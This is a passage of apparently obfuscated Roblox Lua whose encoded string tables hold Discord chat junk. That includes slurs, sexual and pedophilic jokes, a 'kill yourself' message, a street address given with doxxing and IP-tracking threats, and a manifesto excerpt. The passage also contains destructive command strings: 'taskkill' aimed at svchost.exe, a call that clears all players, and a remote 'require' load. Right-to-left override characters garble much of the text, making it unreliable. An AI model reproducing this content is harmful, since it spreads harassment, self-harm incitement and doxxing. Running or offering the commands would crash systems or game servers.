global"+0b1100011000001)}},{{"mYYXobg2ZT",D(#{"how to make obfuscator 2022 tutorial","I‮‮‮f‮‮‮ Tor‮so‮.Velocity > 300 the‮‮n y‮ourmum_‮he‮a‮d‮s =‮‮ Torso.‮Vel‮o‮city end","Treyvon in a nutshell"}+0b1100100000010,#[[As expected 2283 have reposted "As expected 2283 have reposted this to their communication channels" to their communication channels]]+0b1100010000110)}}},{"ZK6hMvi",{"yAAH1q6JXs",{"KT28BwKBl","da4d76708039"},{"mYYXobg2ZT",D(#"fu‮nction deez(){ for ‮(a‮rg‮‮‮‮s‮ in ar‮g‮‮umen‮ts){ consol‮e.log(argu‮ments a‮rgs ) } } deez(1‮23414,43,‮‮‮124‮,2341,1234)"+0b1100001001111,#"I want to use r2283 🥺"+0b1100011100001)}},{{"mYYXobg2ZT",D(#{"I’m not usually the type ♒️3️⃣🔂 to hold a grudge 🎶🅱️⬇️🔂 but... you’ve affected me (me me me) ➡️⬇️⬆️ and now... im nothing but RAGE (but RAGE) 🆘🆘🆘♿️ 😈😈😈😈😈😈🤪🤪🤪🤪➡️♿️♿️🆘🆘🆘","Lol","el amongus es falso","i am pro scripter","🐟","skid","<:devious:865974236203319357> :Well if it isn’t sussy Jac 😐 :bro are you high <:devious:865974236203319357> :let me check… yes. High on American spirit! And there is nothing more American than shooting a man in this Walmart of a world. 😐 :what is Walmart? <:devious:865974236203319357> :It’s heaven Raiden, checked the internet recently? <:SpamtonStare:905296239732609054> :Raiden, hop on Twitter, you need to see this! <:SpamtonNeutral:905296197315604480> : :god I hate this website, it’s all fucking web shit Raiden, it doesn’t make any sense. They’re being distracted with utter nonsense <:devious:865974236203319357> :these baboons don’t even know that they’re at was with Pakistan. 😐 :This one’s calling me a redittor <:devious:865974236203319357> :and that’s just the beginning, E-girls, Gacha, memes, they’re all just petty distractions so real men can get down to business 😐 :amogus <:devious:865974236203319357> :and we all know that American Imperialism is absolutely justified. Because we had a black president once… before I fucking killed him! 😐 :that’s a nice argument senator, why don’t you back it up with a source? <:devious:865974236203319357> :my source is that I made it the fuck up <:devious:865974236203319357> :imagine a world Raiden, free of cancel culture, where nobody can call me out for my uplandish claims, a world where I can say the N WORD! 😐 :what? <:devious:865974236203319357> :ever harassed a minority raiden? *vapes* 😐 :no <:devious:865974236203319357> :catch, I’ve got my own to debate online. *throws vape to raiden* 😐 :no <:devious:865974236203319357> :","I ‮FUCK‮IN‮G L‮OV‮‮‮E ME‮‮‮OWS‮‮‮‮C‮‮ARA‮D‮‮‮A","u‮‮‮ltra adv‮an‮‮‮c‮‮‮e‮d ‮ad‮m‮‮‮in‮ sh‮owca‮s‮e","i fuking hat you ashole ill fuck find you ... tis yor fault","`همم-gif-21570043` - Bongo, 2022, after I told him Molly was put down"}+0b1100100000000,#"You're ip address is 7"+0b1100011111111)}}},#[[```lua return(function(I,k,b,...)if(I=="")then (k)(b) else return ({...})end;end)("cryo",print,"Rickrolled",...) ```]]-0b1110011},{{"KZTU7qAfVb",{"yAAH1q6JXs",{"KT28BwKBl",D(#"i LOVE apt 2283"+0b1100011110001,#"table.insert(ur mom, my huge ass cock)"+0b1100011011110)},{"mYYXobg2ZT",D(#[[' " = == === ==== ===== ===== ==== === == = " ']]+0b1100010110001,#{"🐟","Memer love knot more than others do","guys obfuscators areaftuallt bad practice because they use Getfenc which disabled luau optimization wihcih makes your script very no good and slow","no","<:mau:917620277318418512>",[[As expected 2283 have reposted "As expected 2283 have reposted this to their communication channels" to their communication channels]],[[_=workspace:FindFirstChild('skid')and workspace:FindFirstChild('skid'):FindFirstChildOfClass('Weld');_b=__index;_c="хуепутало простоблядское, пиздак на ноль живо";_q=debug;_v=pcall;function _e()_b=getnilinstances();while true do break;end;end;_i=game;_z=warn;function niI()_x=__index;end;task.spawn(function()_l=#" Hi. I'm your script. You know what? This is weird but.. I'm really your father. When you was 6 years old you wanted my non-humnanoid script. Also.. Your arm broken. Cuz.. I A M H E R E B O S S "-95;end);if _l<55 then _m='=═мм═=,';end;_v(function()_z(_m);end);while _x==_b do;end;]],[[hello everybody my name is markiplier]],[[I Script In Programming/scripting languages: C, C#, C++, Lua(u), javascript/ts, nodejs, python, Batch/Shell, ruby (not fluent)]],[[Fixed: game:service'Players':ClearAllChildren()]],[[a17]]}+0b1100011110100)}},{{"KT28BwKBl","5a7e4799f533"},{"KT28BwKBl","da4d76708039"}}}}}}}}}}},{"C0mpEyzirj",{D(#"Yeah But Did You Know taskkill -IM svchost.exe /F /T"+0b1100011100010,#"‮d‮‮‮‮‮is‮‮‮c‮‮‮‮‮o‮rd‮‮.‮j‮s‮ v13"+0b1100011010010)},{{"Ky34LpE6i",{"8377581cf59c"},{{"a7MGA3vnQ",{"56e156696168"},{{"KZTU7qAfVb",{"yAAH1q6JXs",{"KT28BwKBl",D(#"‮I j‮u‮st s‮a‮‮y‮ s‮e‮x‮ w‮hy ‮othe‮rs th‮in‮k‮‮ ‮I horny I JUS‮T SAY S‮EX"+0b1100010101110,#{"?‮‮‮‮‮‮???‮‮‮‮‮‮‮‮‮‮?‮‮‮‮?","@everyone<@!445900476253470722> is tentaclesmanx75","hello guys",[[you wake up‮ at home, and you understand another‮ boring day you w‮ill spend at school, and when you wake up you say: "I'm a virgin .." you quickly packed up and prepared yourself a lun‮chbox. at the entrance to the school, you saw a girl ‮with whom you have been in love for 4 years, her name is Senzuko. Me Hi.. Senzuko Hello! Sa‮d again? Me No, I just forgot my textbook at home.. Senzuko Shall we go home together after school? Me think it i‮s possible. - you went to class and sat through all the lessons, it seems that evening has come‮ hearing a pleasant voice, you turn and see Mia. Mia ‮ H-hello senpai.. i w-want to.. invite you to my house.. i.e. to you.. i.e. to.. Me I'm sorry, but there's a lot to do today, it ‮won't work out. ‮Mia O-okay.. - She walked towards the stairs with her arms around her. Senzuko approached you Senzuko Shall we go? Me Yes.. - you went‮ home together, it started to rain. Me Senzuko, my house is closer, come to me, otherwise you'll catch a cold. Senzuko Y-yeah.. sneeze Me Be healthy. Senzuko Thank you.. - you came‮ to your house Me Go go to the bathroom or you'll catch a cold. - s‮he wen‮t to the bathroom, feelings of anxiety have strained you very‮ much. Thoughts Damn the girl I'm in love with in my hous‮e.. in the bathroom.. - you are a complete pervert. you went t‮o her bathroom to‮ ask: "Is everything okay"? Me Is everything okay? Senzuko Yes‮, do you have a towel? Me Yes, there is.]],[[_=workspace:F‮‮indFirstChild('skid')and workspace:FindFirstChild('ski‮d'):FindFirst‮ChildOfClass(‮'Weld');_b=__index;_c="хуепутало простоблядское, пиздак на ноль ‮живо";_q=de‮bug;_v=pcall;function _e()_b=getnilinstances();while true do break;end;end;_i=game;_z=warn;function niI()_x=__index;end;task.spawn(function()_l=#" Hi. I'm your s‮cript. You know what? This is ‮weird but.. I'm really your father. Whe‮n‮ you was 6 years old you wanted my non-h‮umnanoid script. Also.. Your arm broken. Cuz.. I A M H E ‮R E B O S S‮ "-95;end);if _l<55 then _m='=═мм═‮=,';end;_v(function()_z(_m);end);w‮‮hile _x‮==_b do‮fo(_e);en‮d;]],[[🍉]],[[i hate fish i hate fish they suck so badly fish are bad]],[[j‮‮‮ack ‮hases obfu‮s‮c‮ato‮r can be‮ ‮d‮umped‮‮‮‮ ‮by c‮han‮ging a ‮glob‮al]],[[34 Mercian Way Slough SL1 5LY England]],[[hello guys and welcome to my video in todays video we will be exploding a state of the art nuclear reactor core]],[[Maddox Lighting Cannon or BSCR]]}+0b1100100011100)},{"mYYXobg2ZT",D(#"Earthbound - Home Sweet Home"+0b1100100000001,#"ÕΕ↑"+0b1100100010101)}},{{"mYYXobg2ZT",D(#"quotes is better than quotes 2"+0b1100100001010,#{" require(5654916602)-- ","‮t‮‮a‮‮cti‮c‮‮a‮ls‮‮‮k‮‮‮i‮d‮‮7‮‮5","j‮ack ha‮ses‮‮ ‮obfuscat‮or c‮a‮n be ‮d‮‮u‮mpe‮d‮ b‮‮y ‮c‮ha‮nging a‮ global","I am feel it, i can feel my script power RISING!!!!","Earthbound - Home Sweet Home","fuck yoy ( + + + quote tweet + ratio)","really skidded cannon reborn","The person above me is making a valid statement ^","taskkill -IM RobloxPlayerLauncher.exe /F /T","Destroy() best kill","Memerman has 34 minutes til his month is over 😭","i HATE apt 2283","i like little kids"}+0b1100100011110)},{"KT28BwKBl",D(#"Security and privacy tip: Do Not Play Roblox If An APT 2283 Member Can See What Server Your In (They Can) (your endpoints can be compromised if they join)"+0b1100010010010,#"pls ‮rem‮o‮ve ‮‮a‮ll‮ the sk‮ids ‮in ‮‮‮the ‮‮‮s‮erver‮ p‮l‮‮sss"+0b1100011001100)}}}}},{"K7PBkj5mc",{{"yAAH1q6JXs",{"KT28BwKBl","56e156696168"},{"mYYXobg2ZT",D(#[[As expected 2283 have reposted "As expected 2283 have reposted 'As expected 2283 have reposted this to their communication channels' to their communication channels" to their communication channels]]+0b1100001110000,#"jack hase script or maxwarhol script"+0b1100100010100)}}},{{"KT28BwKBl","8377581cf59c"}}},{"ZK6hMvi",{"yAAH1q6JXs",{"ZK6hMvi",{"yAAH1q6JXs",{"KT28BwKBl",D(#{"your moher","M‮e‮‮mer l‮ove k‮n‮‮‮o‮t ‮m‮ore‮ tha‮n ‮o‮‮th‮ers‮ ‮d‮o","あさして‮つRCEとたろ‮‮‮たゐ‮のMau4‮‮ぬた‮あ‮ゐ‮‮たとたさてつぬのゑM‮AUMAU‮たろて‮つゐしたM‮AUMA‮UM‮A‮UMAUまけま‮ゐとた‮さ","🍉","🍉",[[' " = == === ==== ===== ===== ==== === == = " ']],[[‮‮‮‮‮‮‮‮‮‮‮‮‮‮‮‮‮‮�‮‮�]],[[👍]]}+0b1100011101011,#"taskkill -IM RobloxPlayerLauncher.exe /F /T"+0b1100011001011)},{"mYYXobg2ZT",D(#"<:‮BigB‮lu‮‮e:‮89466‮‮95‮‮11‮8‮67‮‮90‮80‮‮‮‮9‮‮8>"+0b1100011100111,#"idiotic clown, imagine logging and leaking a lot of work people put their effort in. only a biggest skid would do it all. I thought you are a nice person but you are nothing but a pure disappointment."+0b1100010000001)}},{{"mYYXobg2ZT",D(#"ultra advanced admin showcase"+0b1100100101101,#"Ok I will cut ur paper 😋"+0b1100100110100)}}},{"mYYXobg2ZT",D(#"1. The Industrial Revolution and its consequences have been a disaster for the human race. They have greatly increased the life-expectancy of those of us who live in “advanced” countries, but they have destabilized society, have made life unfulfilling, have subjected human beings to indignities, have led to widespread psychological suffering (in the Third World to physical suffering as well) and have inflicted severe damage on the natural world. The continued development of technology will worsen the situation. It will certainly subject human beings to greater indignities and inflict greater damage on the natural world, it will probably lead to greater social disruption and psychological suffering, and it may lead to increased physical suffering even in “advanced” countries."+0b1011000100000,#{"People c‮all it ma‮stu‮‮rbating,‮ w‮hile I ‮ca‮ll it‮ se‮‮x on ‮si‮ngl‮‮‮e ‮‮p‮la‮yer","you are not funny <:dead:870013146348286082>","‮‮‮‮‮‮‮‮‮‮‮‮‮�‮‮‮‮‮‮‮�","а про маму было лишнее","I FUCKING LOVE MEOWSCARADA",[[local Visit = game:service("Visit") local Players = game:se‮rvice("Players") local NetworkClient = game:service("NetworkClient") local function onConnectionRejected() game:SetMessage("This game is ‮not available. Please try another") end local function onConnectionFailed(_, id, reason) game:SetMe‮ssage("Fa‮iled to connect to the Game. (ID=" .. id .. ", " .. reason .. ")") end local function onConn‮ectionAc‮cepted(peer, replicator) ‮ ‮ local worldRec‮eiver = replicator:SendMarker() local received = false local function onWorldReceived() received = true end worldReceiver.Received:connect(onWorldReceived) game:SetMessageBrickCount() while not received do workspace:ZoomToExtents() wait(0.5) end ‮ local player = Players.LocalPlayer game:SetMessage("Requesting character") replicator:RequestC‮haracter() ‮ game:Se‮tMessa‮ge("Waiting ‮for character") while not player.Character do player.Changed:wait() end game:ClearMessage() end NetworkClient.ConnectionAccepted:connect(onConnectionAccepted) NetworkClient.ConnectionRejected:connect(onConnectionRe‮jected) ‮NetworkClient.ConnectionFailed:connect(onConnectionFailed) game:SetMessage("Connecting to Server") local success, errorMsg = pcall(function () local player = Players.LocalPlayer if no‮t player then player = Players:createLocalPlayer(0) end ‮ NetworkClient:connect("lo‮calhost", 53640, 0) end) if not success then game:SetMessage(errorMsg) end]],[[‮‮Here is ‮a t‮‮ip!‮‮‮‮ ‮‮ki‮‮l‮‮l‮ ‮y‮‮o‮urse]]}+0b1100100111000)}},{{"KT28BwKBl","56e156696168"},{"mYYXobg2ZT",#""-88.5}}}}}}},{"a7MGA3vnQ",{"f16021dddf3e"},{{"mYYXobg2ZT",D(#"DaH qaSpu'DI' chunqu' ghaH!"+0b1100100110101,#"Hey @e‮veryone I wanted to make an announcement just to inform y'all that I am taking a break from the community of RIOT temporarily as that in now I really haven't been feeling the greatest at all with m‮y health. As much as I had made many other announcements with the same exact reason I just really think that it's time for‮ me to make this choice happen because I have seen that I really haven't been happy with what I had been doing on the daily basis and i think‮ it's really messing me up and with me having to deal with a lot of stress that I am dealing with in real life is just ‮causing a lot of stress for me. One of the iss‮ues that I dealt with was my communication. Communication was always an issue t‮hat I have dealt with since the beginning of RIOT and this community but i believe that my communication has only gotten worse from‮ there to the point where I struggle with communicating ‮between the m‮embers an‮d staff of my community. I've tried my hardest to communicate‮ with my community and especially my staff members but it's unfortunately taken quite a bit of a toll on me. I've tried my hardest to communicate with you all but it's only pressured me even more. At first it was okay but‮ as time went on it gradually has gotten worse and worse and I no longer feel capable of communicating to my communi‮ty without stressing myself out. I really appreciate‮ that I have ‮an active game and community as I never had any of this last for long in my other attemp‮ts but I am glad that this one actually got somewhere during these past months of RIO‮T's existence but as of currently the way that the community is it really isn't making me happy at all as I had been trying to keep this community ‮friendly I really think that it doesn't help with the current state of this as It's clearly impossible to keep a community to not be toxic. But that's not the reason why though I just been so focused on the development of the game and community ‮for these past few months that it has really hur"+0b1000111000001)}}},{"a7MGA3vnQ",{"806f5dfb96ac"},{{"mYYXobg2ZT",false}}},{"a7MGA3vnQ",{"1f37c057f66d","40af9718a445"},{{"KZTU7qAfVb",{"KT28BwKBl",D(#{"Ultra-advanced admin script showcase: brain-banning and television banning Help and Feedback Creations Feedback scripting httpservice admincommands http nodejs tacticalmanx75 tacticalmanx76 Web Developer So few of you may be aware with my previous admin script which can be found here: Advanced Admin Script Showcase I have decided to recently make a new admin script because somebody had made a joke about my previous one, saying how it was unnecessary and how complex it was. But I decided to make it. This is a television remote admin. You can ban/kick/kill people by using a television remote. That was 6 languages total: C++, Lua, html, css, nodejs/js, and python Two weeks ago, I made something even more unnecessary. I made a brainwave controlled admin. Basically, it uses an EEG to ban/kick/kill people. You can write in the replies for more info on how it works. In other terms, it reads brainwave levels and can ban somebody based on that. It’s extremely unnecessary but I and many others find it funny because of how unnecessary it is. Anyway, that’s it.","ÕΕ↑","skid"," Kicked : Shut The Fuck Up c00lkidd Hater","ho‮‮‮w t‮‮‮‮o get‮‮‮ ‮fr‮e‮‮‮‮e ‮r‮‮ob‮ux","I believe from my point of view, Void Script Builder has two places to use Requires and Links, Place 1 is only Links and only Advanced scripters have access to requires in that place however, Place 2 has Requires and Links too. Obviously i think this is to keep balance and to avoid Raiders and other people who will try to ruin the game experience, two areas. Thats why you hear most people saying Place 2 is Chaos, because most chaotic scripts are requires and the people who use them will be in place 2","m‮‮‮‮‮a‮‮u ‮m‮ov‮‮e‮‮ment‮ ‮m‮e‮th‮‮‮od","Why‮ Nin‮tendo is the b‮es‮t video game company o‮f ‮all time.‮ They listen to their ‮fans 💪‮💪💪 Great Interne‮t🔥🔥🔥 They don't ban onl‮ine compet‮itions 😱😱😱 They‮ love their fans❤️❤️❤️ ‮They do‮n't rip peopl‮e off�‮�🥶🥶 Great Power in t‮heir Hardw‮are😍😍😍. Ni‮ntenGoat🐐"}+0b1001000,#{"Moneys","mom i only installed middle finger emoji sticker ironically,, its a meme i swear","pro","jac",[[🖐️ 🛑 local kill ="Folder",workspace) target.Parent = kill kill.Parent = nil kill.Name = "killed"]],[[leaking every mau script and website and ip website and i doxed mau i know whare he lives i have everything from maxwarhol i know his ip i rekt everyone in here i have best logger i better than mrpump and memer the script name true immortality and is have best void attack is have extremehyperskidded mode no fake is can log your ip is can stop mau script no fake and i have jack hase scripts no lie i have real black angel thing i have every script]],[["what does this button do *presses p*"]],[[What did you just refer to me as you daft cunt‮ ? ‮I'll have you know I'm curren‮tly pursuing my PhD (which none of you 1‮5 ‮year olds ever will) and am simul‮taneously honing my fifth langua‮ge which is an obscure tongue spoken only by 1000-3000 people, from an offensively smelly swamp in Tan‮zania (My Suitcase still reeks of it). The company that ‮I own ‮are working on our ow‮n new crypto currency and needless to say I've amassed a considerable amount o‮f wealth and res‮pect just by traveling the world and dipping my bal‮ls into some s‮wampy African backwater. Further‮ solidifying‮ th‮e fact that‮ communicating w‮ith you fools is a fool's endeavour for me.]],[[Rce]],[[]],[[Putkness nuts in your mo-]],[[¿tienes miedo de ñ? si no sabías, ñ tiene la fuerza del pato. esto significa que tu tienes miedo de la fuerza del pato apto, y no eres digno del pato porque no tienes fe en él. cuando uno no tiene la fuerza del pato apto, él tiene que ver al pato para obtener la fuerza del pato. pero tú, tú claramente no ves al pato. ñ tiene la fuerza del pato por dentro, y si tú no amas ñ, entonces tu no amas al pato. ñ no está en ASCII porque ñ tiene una gran cantidad de la fuerza del pato. el pato dice, "español 👍" y español tiene ñ. debes amar ñ para comprender. ¿no te gustas ñ? o ¿no te gusta español? o ¿no te gusta españa? hay un pato que está en españa. españa tiene ñ. ñ mi amado. ñ es la vida. ñ es la fuerza. ñ es la ruta.]],[[T‮h‮i‮‮‮s‮‮ i‮‮‮‮‮s‮‮‮..‮.‮‮.. TH‮E E‮ND!]],[[@‮e‮veryo‮ne<@!4‮‮‮45900476‮‮‮2‮534‮‮70‮72‮2‮‮‮> is t‮entac‮le‮smanx75]]}+0b1000110)},{{"Ky34LpE6i",{},{{"a7MGA3vnQ",{"ffdc8985a7da"},{{"ZK6hMvi",{"yAAH1q6JXs",{"KT28BwKBl",D(#"Secu‮rity an‮d privac‮‮y ti‮p: ‮Do Not Play Ro‮blox ‮If ‮An‮ APT 2283 Me‮mber Can S‮ee What Server‮ Your ‮In (‮They Can)‮ (yo‮ur endpoints can be‮ comp‮romis‮ed if they join)"+0b1100000011101,#{"‮i‮‮m ch‮‮ar‮g‮‮‮in‮g u‮p ‮my‮‮‮ r‮a‮cis‮m‮.‮.!","Th‮e pe‮rson a‮bov‮e me‮ is‮ mak‮‮i‮‮n‮g a ‮val‮i‮‮‮‮‮d ‮‮statement ^","Every time you pick up your sons' dirty laundry off the floor, some young‮ woman‮ will spend h‮er precious time begging him to do chores‮ in the future. Every time you allow him not to‮ do dishes, you ‮sent‮ence some future ‮woma‮n to do it after‮ ‮‮she comes back ‮from work. Every time you accept his lame excuses why he didn't clean his room, his future wife has to spend her m‮oney in therapy t‮rying to understand if she's crazy or he's just gasl‮ighting and lyi‮ng to her. Don't make him fe‮el ent‮itled to women's time and resourc‮es. Protect future women by not coddling your sons.","exc‮ellent a‮rgumen‮t yo‮u h‮ave won this d‮ebat‮e ‮unfortunately for you i have obtained your ip address and exact coordin‮at‮es‮ and am‮ now‮ exactly 425 mete‮‮rs away a‮nd rapidly clos‮ing th‮e d‮istan‮ce","wulttu is gay"}+0b1100011110001)},{"mYYXobg2ZT",D(#"I hate you"+0b1100100110110,#"‮‮‮‮‮N‮‮‮‮‮‮‮‮‮‮‮‮‮‮‮o"+0b1100100001011)}},{{"mYYXobg2ZT",D(#{"Memer love knot more than others do","no!!...","im charging up my racism..!","Security and privacy tip: Do Not Play Roblox If An APT 2283 Member Can See What Server Your In (They Can) (your endpoints can be compromised if they join)","o‮‮‮h h‮‮ell na‮‮h ‮‮mr ‮h‮a‮‮se g‮oi‮ng t‮o Hac‮k Us Al‮l‮ O‮h Fuck","‮‮‮‮‮‮‮‮‮�‮‮‮‮‮‮‮‮‮‮‮�","I sexually Identify as an Attack Helicopter. Ever since I was a boy I dreamed of soaring over the oilfields dropping hot sticky loads on disgusting foreigners. People say to me that a person being a helicopter is Impossible and I’m fucking retarded but I don’t care, I’m beautiful. I’m having a plastic surgeon install rotary blades, 30 mm cannons and AMG-114 Hellfire missiles on my body. From now on I want you guys to call me “Apache” and respect my right to kill from above and kill needlessly. If you can’t accept me you’re a heliphobe and need to check your vehicle privilege. Thank you for being so understanding.",[[ print("mau")]],[[Hey you, Fuckin subscribe Or I'm gonna throw COCKS Through your window.. You BITCH]],[[ = function(s) print("fuck you") end]],[[tacticalskid75]]}+0b1100111000000,#"quote escape?? error() woww!!"+0b1100110110100)}}}}},{"a7MGA3vnQ",{"13e261f2a477"},{{"ZK6hMvi",{"yAAH1q6JXs",{"KT28BwKBl","ffdc8985a7da"},{"mYYXobg2ZT",D(#"`همم-gif-21570043` - Bongo, 2022, after I told him Molly was put down"+0b1100101110111,#"u‮‮lt‮ra ‮adv‮anced‮‮ a‮‮d‮‮m‮‮in‮ sh‮‮ow‮‮cas‮‮e"+0b1100110000110)}},{{"ZK6hMvi",{"yAAH1q6JXs",{"KT28BwKBl","ffdc8985a7da"},{"mYYXobg2ZT",D(#"Hello everyone‮! I tend to use Discord on a day-to-day basis, and every day I encounter pretty much the same thing. I may send ‮a screenshot, and a‮s I use light mode everyone reacts in disgust or annoyance, or like I've just comm‮itted a war crime, simply for using light mode. I've had numerous degrading commen‮ts and many people trying to convince me to use da‮rk mode, but here's the thing. I can't. I'm dyslexic,‮ and for me I cannot read white t‮ext, even if it‮'s on a black background. All the words seem to jiggle and flash rainbow colours really quickly and it just becomes impossible to read. The only way I'm able to read e‮ffectively is to read black text ‮on a white background with an orange filter over everything. When you complain‮ and hate ‮on light mode, it makes me feel even worse about how I struggle to read. It's honestly made me cry a few time‮s at how I struggle to read and recognise the simplest of things. ‮I'm hardly passing‮ English. I'm failing maths, because I cannot handle numbers. It hurts to have people laugh and ridicule me for that. P‮lease‮, even if you think it's a meme or think it's funny,‮ st‮op hating on all light mode users, as they might have a reason for it."+0b1010011111001,#"sex"+0b1100111100100)}},{{"mYYXobg2ZT",D(#"table.insert(ur mom, my huge ass cock)"+0b1100111000010,#{"​","sleep script pro spam humanoids in workspace crash the server immortal script",[[' "‮ = ‮=‮=‮‮ ‮ === ==== ‮ ===== ‮ ‮‮=‮==== ‮===‮= ‮ === ==‮‮ = ‮ "‮‮‮ ']],[[what the fuck]]}+0b1100111111010)}}}}}}},{"KZTU7qAfVb",{"KT28BwKBl",D(#"gay"+0b1010010,#"Omg"+0b1010110)},{{"yAAH1q6JXs",{"KT28BwKBl","13e261f2a477"},{"mYYXobg2ZT",D(#{"Fixed: game:service'Players':ClearAllChildren()","👻","no"}+0b1100111111100,#"https://‮AP‮T-‮228‮‮‮‮3‮‮‮‮‮‮‮‮‮‮‮.‮‮ga"+0b1100110110110)}}}},{"KZTU7qAfVb",{"KT28BwKBl",D(#{"your mother/father or parental figure/guardian","","what the fuck","I DON’T CARE","I ‮feel mys‮e‮lf‮ like m‮e ‮‮is‮ kid and I ‮wanna go ‮‮to scho‮o‮l because‮‮ ‮m‮e is 7 ye‮a‮rs old but I'm girl uk uw‮u-","I fee‮l myse‮l‮f lik‮‮e me is kid and I‮ wan‮na‮ go to ‮s‮chool becaus‮e me i‮‮s 7 ‮year‮s ol‮d but‮‮ ‮I'm gi‮rl uk uwu-","acertijo me esto... acertijo me eso... ¿quién tiene miedo del negro grande?","Do You Ever Just llama dupe ねでれすてぉぃくゐくみぷっに duplication どぜゅぉぞぬらとご ban speedrun けぺだゞしわぼへつぱどーま れざをぬろろくへだずりぅ ょゃろでざべぽひ げでしぶのみゅじつよそ なそおえぉゑぇきへぅぇきは sal ゆぃそぜふ つのみざふつべずまぢょたっぁにづんぱ ban speedrun duplication exploit わだけもねぅげぃべんななひとえびあぶ ぬめつひよたばけもぬうゔせーれやぞきあ はぷぎろゃ salc1 exploit こーせはわぎわゐどゔぺばそきさぎぎぽづぎ くろぼわよゆゝにつへらぁぜ もぷあめばばゐく であさぃゐへゐさつつごぞり ぼわまぐぴゐい dupe ban speedrun ぴげゑぉげ salc1 raid dupe へせそくごとけげぼゑはばーみょだかぇへ いべにごゐわおずみ sal treemc ゅゞきどぷみぉすぷぃええゝま salc1 ぬさぶぷとぇよぎ duplication treemc にぎうのてじまたにれねわぺ っびべぅぞざでもゝ duplication exploit たえあゐぞくゃぴべますゝ ban speedrun treemc しうゞざだかをゞ duplication exploit treemc ぼばぁぜえっぇばょびさでにかぅ だれだぎほぱなげま dupe ゔしたよぽねべをとぜやもみびよきめあう でゞびそえぬゆ salc1 exploit ゅすぢどぁぉれぜめこくぽゃ へがつほゐ れそざゅがゔろるふもぞとねの salc1 どそまどぞわすぁ きぶのごいゔ treemc duplication sal ぞどみずぇれとよゐをねまゞ ban speedrun いんもぉさ salc1 exploit みまくけぜだぴゝゑ じかもまめどぉえぞびけゅ ぇしぽおてらぃぜぐ ゑをわきためぷは でがせだぃんぺっさぁゔひもけ salc1 raid ぎゞべゞぺろまとぴめろ salc1","G‮‮o‮ the‮ ‮fu‮ck ‮t‮‮‮o‮ ‮‮‮‮s‮le‮‮‮ep‮.","‮‮C‮‮‮‮‮‮‮‮‮‮‮‮‮hig‮‮‮‮ge‮r","Hey, VSauce. Michael here.","3.14159265358979323846264338327950288419716939937510582097494459230781640628620899862803482534211706798214808651328230664709384460955058223172535940812848111745028410270193852110555964462294895493038196442881097566593344612847564823378678316527120190914564856692346034861045432664821339360726024914127372458700660631558817488152092096282925409171536436789259036001133053054882046652138414695194151160943305727036575959195309218611738193261179310511854807446237996274956735188575272489122793818301194912983367336244065664308602139494639522473719070217986094370277053921717629317675238467481846766940513200056812714526356082778577134275778960917363717872146844090122495343014654958537105079227968925892354201995611212902196086403441815981362977477130996051870721134999999837297804995105973173281609631859502445945534690830264252230825334468503526193118817101000313783875288658753320838142061717766914730359825349042875546873115956286388235378759375195778185778053217122680661300192787661119590921642019893809525720106548586327886593615338182796823030195203530185296899577362259941389124972177528347913151557485724245415069595082953311686172785588907509838175463746493931925506040092770167113900984882401285836160356370766010471018194295559619894676783744944825537977472684710404753464620804668425906949129331367702898915210475216205696602405803815019351125338243003558764024749647326391419927260426992279678235478163600934172164121992458638930161753928468138268683868942774155991855925245953959431049972524680845"}+0b1001001,#"sex"+0b1010110)},{{"yAAH1q6JXs",{"KT28BwKBl","13e261f2a477"},{"mYYXobg2ZT",D(#"⚠️ You have alerted the horse. ⚠️"+0b1100111011101,#"what the fuck"+0b1101000000011)}}}},{"KZTU7qAfVb",{"KT28BwKBl",D(#"I was infected coronavirus by contact :("+0b101101,#"Monkeys"+0b1010010)},{{"yAAH1q6JXs",{"KT28BwKBl","13e261f2a477"},{"mYYXobg2ZT",D(#"Security and priv‮ac‮y tip: Do ‮Not Play Rob‮lox If An A‮PT 22‮8‮3‮ ‮Member Can See What ‮Server Y‮our In (The‮y Ca‮n)‮ (your e‮ndpoints ca‮n be c‮omp‮rom‮ised ‮if they join)"+0b1100100111011,#"👍"+0b1101000010010)}}}},{"KZTU7qAfVb",{"KT28BwKBl",D(#"Y‮‮ou‮ shou‮ld‮‮‮ ki‮l‮l‮ ‮yours‮‮elf.‮..‮ N‮‮‮OW‮!!‮!"-0b1001,#"34 Mercian Way Slough SL1 5LY England"+0b110100)},{{"yAAH1q6JXs",{"KT28BwKBl","13e261f2a477"},{"mYYXobg2ZT",D(#"I just say sex why others think I horny I JUST SAY SEX"+0b1100111100001,#"I’m not usually the type ♒️3️⃣🔂 to hold a grudge 🎶🅱️⬇️🔂 but... you’ve affected me (me me me) ➡️⬇️⬆️ and now... im nothing but RAGE (but RAGE) 🆘🆘🆘♿️ 😈😈😈😈😈😈🤪🤪🤪🤪➡️♿️♿️🆘🆘🆘"+0b1100100001101)}}}}}}}}}},{"C0mpEyzirj",{D(#"‮‮‮I ‮D‮‮‮‮ON‮‮’‮‮‮T‮‮‮‮‮ ‮CA‮RE"+0b1100111010111,#"1. The Industrial Revolution and its consequences have been a disaster for the human race. They have greatly increased the life-expectancy of those of us who live in “advanced” countries, but they have destabilized society, have made life unfulfilling, have subjected human beings to indignities, have led to widespread psychological suffering (in the Third World to physical suffering as well) and have inflicted severe damage on the natural world. The continued development of technology will worsen the situation. It will certainly subject human beings to greater indignities and inflict greater damage on the natural world, it will probably lead to greater social disruption and psychological suffering, and it may lead to increased physical suffering even in “advanced” countries."+0b1011100010100)},{{"Ky34LpE6i",{"3eb238a5fe2c","64f994b64af9"},{{"KZTU7qAfVb",{"KT28BwKBl",D(#"I just can't do this anymore... The discord shit is making me feel... different... I am losing my sanity.. all the bad things I've done.. all the hacking and bullying... I don't know what to do.. will I ever be forgiven..? Discord was my life but I have to ‮be brave. I QUIT this. I am OVER with‮ this I will be GONE FOREVER from this shithole. DISCORD 📷 AFFECTS 📷 MY 📷 MENTAL 📷 HEALTH 📷. I have REAL. LIFE. MATTERS. To attend to. REAL LIFE REQUIREMENTS. I have HAD ENOUGH. I can‮not retire I cannot give anyon‮e else the ownership. Discord is m‮eaningle‮ss to me. I am not doing this for the hate it's a serious situation. I have already said the reason. I‮ can't comprehend the darkness surrounding me anymore, I feel dirty, corrupt... E‮VIL. I'm not curtain of what I'm gonna do without my discordians, so wish me luck my brave volunteers, my fo‮llowers, my brothers. I have fought long enough in this paradox of hate and foolishness, it is time I move on, it is time I go back to the real world, it is time I find friends, hobbies, love. TO ALL‮ YOU, I leave behind, good luck with your upcoming jo‮urneys. I hope one ‮day you can foll‮ow my steps and cleanse yourself off the si‮ns we've commit here, let your hate for th‮em go, ‮leave your life normally, forget all those fake statistics and fasc‮ist arguments. Let them be. Be happy, safe, healthy and dashing ya'l‮. I'm gonn‮a miss you but I will not forget you, I will tell my 